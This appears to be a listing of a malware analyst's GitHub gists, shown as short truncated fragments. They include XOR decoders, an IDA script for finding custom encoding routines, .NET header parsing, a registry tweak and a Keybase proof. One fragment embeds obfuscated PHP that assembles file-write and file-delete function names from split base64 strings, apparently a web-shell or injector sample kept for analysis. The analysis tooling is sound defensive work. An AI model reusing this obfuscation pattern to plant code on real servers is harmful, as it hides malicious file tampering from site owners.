| # Based on WMI code from http://mail.python.org/pipermail/python-win32/2006-March/004340.html | |
| import os | |
| def process_running(procname): | |
| def find_pid(processname): | |
| import win32com.client | |
| for proc in win32com.client.GetObject('winmgmts:').InstancesOf('win32_process'): | |
| if proc.Name.upper() == processname.upper(): | |
| return proc.Properties_('ProcessId') | |
| import os | |
| import subprocess | |
# Machine-specific settings for the TrueCrypt command line this script drives.
# NOTE(review): all three are hard-coded absolute values; adjust them before
# running on another host. The code that consumes them is not shown here.
tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe"  # TrueCrypt executable (default install path)
tc_file = "E:\\test.tlc"  # presumably the container file to operate on -- confirm against the call site
drive_letter = "P"  # presumably the drive letter the container is mounted as -- confirm against the call site
| def leet_lookup(char): | |
| list = {"a": ["a","A","@"], | |
| "b": ["b", "B", "8"], |
| import os | |
| import sys | |
| from PyQt4.QtCore import * | |
| from PyQt4.QtGui import * | |
| import base64 | |
| def main(): | |
| app = QApplication(sys.argv) | |
| w = MyWindow() | |
| w.show() |
| import base64 | |
| script = """ | |
| <? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' |
| #@bbaskin | |
| import os | |
| import re | |
| # Thanks to Andrew Havens of Cipher Tech for figuring out how to escape the parentheses so they work with | |
| # both os.path.expandvars and the regex | |
| def generalize_vars_init(): | |
| """ | |
| Initialize a dictionary with the local system's environment variables. |
| # Python 2 | |
def multibyte_xor(data, key):
    """Python 2 only: XOR each byte of ``data`` with the repeating ``key``.

    ``data`` and ``key`` are Python 2 ``str`` byte strings. The key is
    cycled with ``itertools.cycle``, so it may be shorter than ``data``;
    the result is a ``str`` of the same length as ``data``. XOR is its own
    inverse, so calling this twice with the same key restores the input.

    ``itertools.izip`` does not exist on Python 3 -- this variant will fail
    with ImportError there; the Python 3 version below is the one to use.

    NOTE(review): an empty ``key`` makes ``cycle`` yield nothing, so
    ``izip`` stops immediately and ``''`` is returned instead of an error --
    a silently empty "decode" is easy to miss when driving this from a loop.
    """
    from itertools import izip, cycle
    return ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(data, cycle(key)))
| # Python 3 | |
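def multibyte_xor(data, key):
    """XOR every byte of ``data`` with the repeating multi-byte ``key``.

    Args:
        data: bytes-like input (``bytes``, ``bytearray`` or ``memoryview``).
        key: non-empty bytes-like key. It is cycled with ``itertools.cycle``,
            so it may be shorter than ``data``. XOR is its own inverse, so
            applying this function twice with the same key restores ``data``.

    Returns:
        ``bytes`` of the same length as ``data`` (``b""`` for empty input).

    Raises:
        ValueError: if ``key`` is empty. Before this check an empty key made
            ``cycle`` yield nothing, ``zip`` stopped at once and the function
            silently returned ``b""`` -- when decoding a payload that looks
            like "nothing was encoded" rather than "bad key".
    """
    from itertools import cycle
    if not key:
        raise ValueError("multibyte_xor: key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))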
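Windows Registry Editor Version 5.00

; Adds a "Command Prompt Here" verb to the context menu of every file-system
; object (AllFilesystemObjects covers files as well as folders). %L expands to
; the long path of the selected item; "/k" keeps the prompt open after "cd".
;
; "cd /d" instead of plain "cd": without /d, cmd.exe only changes the current
; directory *of the target's drive* and the prompt stays on its starting drive
; whenever the item lives elsewhere (e.g. a D:\ folder from a C:\ prompt).
;
; Notes: cmd.exe is not given by full path, so it resolves through the normal
; executable search order; and for a *file* the "cd" fails and the prompt
; opens in cmd.exe's default directory instead. Writing under
; HKEY_CLASSES_ROOT needs an elevated prompt.
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\Command Prompt Here\command]
@="cmd.exe /k cd /d \"%L\""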
| # Automatically find XOR/SHL/SHR routines from an executable | |
| # Uses IDAW (text IDA) | |
| # @bbaskin - brian @ thebaskins.com | |
| # While other, more powerful scripts such as FindCrypt locate known | |
| # algorithms, this one is meant to find custom encoding or modified | |
| # encryption routines that those signature-based scripts miss. | |
| """ | |
| Script results: | |
| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |
| def get_NET_version(data): | |
| """ | |
| Code to extract .NET compiled version. | |
| typedef struct t_MetaData_Header { | |
| DWORD Signature; // BSJB | |
| WORD MajorVersion; | |
| WORD MinorVersion; | |
| DWORD Unknown1; | |
| DWORD VersionSize; | |
| PBYTE VersionString; |
| ### Keybase proof | |
| I hereby claim: | |
| * I am Rurik on github. | |
| * I am bbaskin (https://keybase.io/bbaskin) on keybase. | |
| * I have a public key whose fingerprint is AFD8 C071 A2CE E394 D226 4F19 8732 1B4E 326D FD20 | |
| To claim this, I am signing this object: |